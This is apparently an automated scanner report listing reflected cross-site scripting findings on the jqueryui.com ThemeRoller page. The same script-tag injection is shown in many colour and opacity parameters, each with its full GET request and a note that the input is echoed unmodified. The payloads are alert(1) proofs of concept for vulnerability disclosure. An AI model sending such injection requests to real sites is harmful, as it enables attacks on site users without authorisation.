GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a82842612"><script>alert(1)</script>8e5b70fa715&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7e59"><script>alert(1)</script>5ae29252980 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45ca7e59"><script>alert(1)</script>5ae29252980&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57ce5"><script>alert(1)</script>6c8eb05e3fb was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce57ce5"><script>alert(1)</script>6c8eb05e3fb&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b933"><script>alert(1)</script>c75e71b9a99 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=6666663b933"><script>alert(1)</script>c75e71b9a99&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f68ae"><script>alert(1)</script>8316832d0b1 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000f68ae"><script>alert(1)</script>8316832d0b1&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40f2"><script>alert(1)</script>1ea11700b86 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65b40f2"><script>alert(1)</script>1ea11700b86&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3cd4"><script>alert(1)</script>c1869e1c15c was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100f3cd4"><script>alert(1)</script>c1869e1c15c&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12788"><script>alert(1)</script>4cac5b3259f was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=10012788"><script>alert(1)</script>4cac5b3259f&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3652"><script>alert(1)</script>712a67946a6 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18f3652"><script>alert(1)</script>712a67946a6&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5736"><script>alert(1)</script>7a42dd72740 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35c5736"><script>alert(1)</script>7a42dd72740&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef96f"><script>alert(1)</script>5a4c88ddb1b was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75ef96f"><script>alert(1)</script>5a4c88ddb1b&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4287e"><script>alert(1)</script>b19fe4c69d3 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=1004287e"><script>alert(1)</script>b19fe4c69d3&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf8c3"><script>alert(1)</script>e7f1ed5ee7 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20cf8c3"><script>alert(1)</script>e7f1ed5ee7&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
